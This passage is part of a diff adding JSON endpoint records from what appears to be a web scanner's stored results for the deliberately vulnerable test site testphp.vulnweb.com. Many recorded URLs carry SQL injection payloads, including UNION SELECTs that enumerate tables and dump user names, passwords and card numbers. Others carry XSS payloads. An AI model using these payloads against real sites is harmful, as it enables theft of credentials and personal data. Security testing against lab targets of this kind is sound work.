5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1831, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1%20UNION%20SELECT%201,%202,%203,%204,%205,%206,%20Table_name%20as%20TablesName,%208,%209,%2010,%2011%20FROM%20information_schema.tables", + "content_length": 45584, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:26.316Z", + "response_time": 0.356268268, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1832, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,group_concat(uname,%22:%22,pass,%22::%22,cc,%22:::%22,address,%22::::%22,email),8,9,10,11%20from%20users", + "content_length": 8380, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:26.458Z", + "response_time": 0.350028623, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1834, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1%D8%B7%D8%A8%D8%A7%D8%B1%D9%84%D8%A7%D8%A8", + "content_length": 4879, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:28.878Z", + "response_time": 0.34597619500000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1835, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1%E2%80%A2%D8%B9%D9%90%D9%82%D9%88%D9%85%D9%84%D8%A7%7Ctestphp.vulnweb.com%E2%80%A2%D8%B1%D9%8A%D8%BA%D8%AA%D9%8C%D9%85%D9%84%D8%A7", + "content_length": 4882, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:29.017Z", + "response_time": 0.357831437, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1836, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1%EF%80%A0", + "content_length": 4868, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:29.175Z", + "response_time": 0.353799482, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1837, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1%EF%80%A0%EF%82%B7", + "content_length": 4871, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:29.356Z", + "response_time": 0.34909380399999995, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1838, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1''", + "content_length": 4977, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:29.717Z", + "response_time": 0.353187891, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1839, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1+PROCEDURE", + "content_length": 4984, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:29.854Z", + "response_time": 0.35049706300000005, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1840, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1+Union+Select+@k:=0x3c2f5469746c652f3c2f5363726970742f27223e3c5376672f4f6e4c6f61643d616c6572742831293e,@k,@k,@k,@k,@k,@k,@k,@k,@k,@k%23", + "content_length": 8618, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:30.000Z", + "response_time": 0.349294451, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1848, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1+and+SELECT+1+from+admins+limit+0,1", + "content_length": 5005, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:34.867Z", + "response_time": 0.344214652, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1850, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1", + "content_length": 7880, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:35.158Z", + "response_time": 0.357750263, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1851, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+12", + "content_length": 4866, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:35.304Z", + "response_time": 0.35642630000000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1852, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+2", + "content_length": 7880, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:35.438Z", + "response_time": 0.353576393, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1853, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11", + "content_length": 8299, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:35.581Z", + "response_time": 0.34412362, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1854, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--", + "content_length": 8299, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:35.718Z", + "response_time": 0.343253486, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1855, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+%27vuln1%27,@@version,%27vuln3%27,%27vuln4%27,%27vuln5%27,%27vuln6%27,%27vuln7%27,%27vuln8%27,%27vuln9%27,%27vuln10%27,%27vuln11%27", + "content_length": 8349, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:35.854Z", + "response_time": 0.353202695, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1856, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+%27vuln1%27,database(),%27vul", + "content_length": 4979, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:35.999Z", + "response_time": 0.355575218, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1857, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11", + "content_length": 8299, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:36.150Z", + "response_time": 0.349116684, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1859, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1--dbs", + "content_length": 4867, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:36.440Z", + "response_time": 0.35087634300000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1860, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1", + "content_length": 4977, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:36.707Z", + "response_time": 0.354308489, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1861, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165", + "content_length": 4990, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:36.846Z", + "response_time": 0.353085932, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1862, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped", + "content_length": 4997, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:39.109Z", + "response_time": 0.352857176, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1863, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR-", + "content_length": 5001, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:39.276Z", + "response_time": 0.359446018, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1864, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-", + "content_length": 5005, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:39.441Z", + "response_time": 0.34455774, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1865, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-2", + "content_length": 5006, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:39.608Z", + "response_time": 0.352873206, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1866, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-2http://www.vulnsite.com/products/shop", + "content_length": 5043, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:39.765Z", + "response_time": 0.353178613, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1867, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1/nginx/1.4.1176.28.50.165Skipped-NR--NR-2http://www.vulnsite.com/products/shop.php?id=13", + "content_length": 5054, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:40.090Z", + "response_time": 0.34913246600000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1870, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=13", + "content_length": 5015, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:40.836Z", + "response_time": 0.350049436, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1871, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133", + "content_length": 5016, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:40.991Z", + "response_time": 0.34897378900000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1872, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=10", + "content_length": 5051, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:42.655Z", + "response_time": 0.35854629499999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1873, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=12.www.vulnsite.com/products/shop.php?id=133.www.icdcprague.org/index.php?id=104", + "content_length": 5052, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:43.719Z", + "response_time": 0.35436530699999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1900, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert", + "content_length": 4990, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:51.203Z", + "response_time": 0.35470007600000003, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1901, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=123%22%3E%3Cscript%3Ealert(45)%3C/script%3E&zfdfasdf=124fffff", + "content_length": 5003, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:51.356Z", + "response_time": 0.344111644, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1906, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=13Database", + "content_length": 4874, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:55.789Z", + "response_time": 0.351349497, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1907, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=13DatabaseManipulations", + "content_length": 4887, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:55.944Z", + "response_time": 0.35784125699999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1908, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=13DatabaseManipulationsSQL", + "content_length": 4890, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:56.120Z", + "response_time": 0.349368411, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1910, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1A01", + "content_length": 4868, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:56.451Z", + "response_time": 0.34045488999999995, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1911, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1Attack", + "content_length": 4871, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:56.635Z", + "response_time": 0.35308047699999995, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1912, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1Current", + "content_length": 4872, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:56.798Z", + "response_time": 0.35198235699999997, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1913, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1Database", + "content_length": 4873, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:56.938Z", + "response_time": 0.35399597, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1915, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=1a", + "content_length": 4866, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:57.225Z", + "response_time": 0.346962966, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1916, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=2", + "content_length": 5311, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:57.362Z", + "response_time": 0.35626171, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1917, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=2%20ORDER%20BY%2011", + "content_length": 5311, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:57.498Z", + "response_time": 0.352190555, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1918, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=2%3E%3Cscript%3Ealert(%22Anmol%22)%3C/script%3E", + "content_length": 5007, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:57.635Z", + "response_time": 0.35575500899999996, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1921, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=5-4", + "content_length": 7880, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:25:59.973Z", + "response_time": 0.354278546, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1923, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=FUZZ", + "content_length": 4868, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:00.255Z", + "response_time": 0.34014305, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1925, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=FUZZTotal", + "content_length": 4873, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:00.838Z", + "response_time": 0.356919267, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1926, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=extractvalue", + "content_length": 4876, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:01.003Z", + "response_time": 0.352485078, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1928, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=z", + "content_length": 4865, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:01.574Z", + "response_time": 0.35288467100000004, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1929, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert(45)%3E", + "content_length": 5016, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:01.734Z", + "response_time": 0.346239741, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1930, + "fields": { + "scan_history": 1, + "target_domain": 1, + "subdomain": 88, + "source": null, + "http_url": "http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert(45)%3C%2Fscript%3E", + "content_length": 5009, + "page_title": "pictures", + "http_status": 200, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:26:03.374Z", + "response_time": 0.35223483800000005, + "webserver": "nginx/1.19.0", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 1, + 5, + 9, + 10 + ], + "endpoint_subscan_ids": [] + } +}, +{ + "model": "startScan.endpoint", + "pk": 1931, + "fields": { + "scan_history": 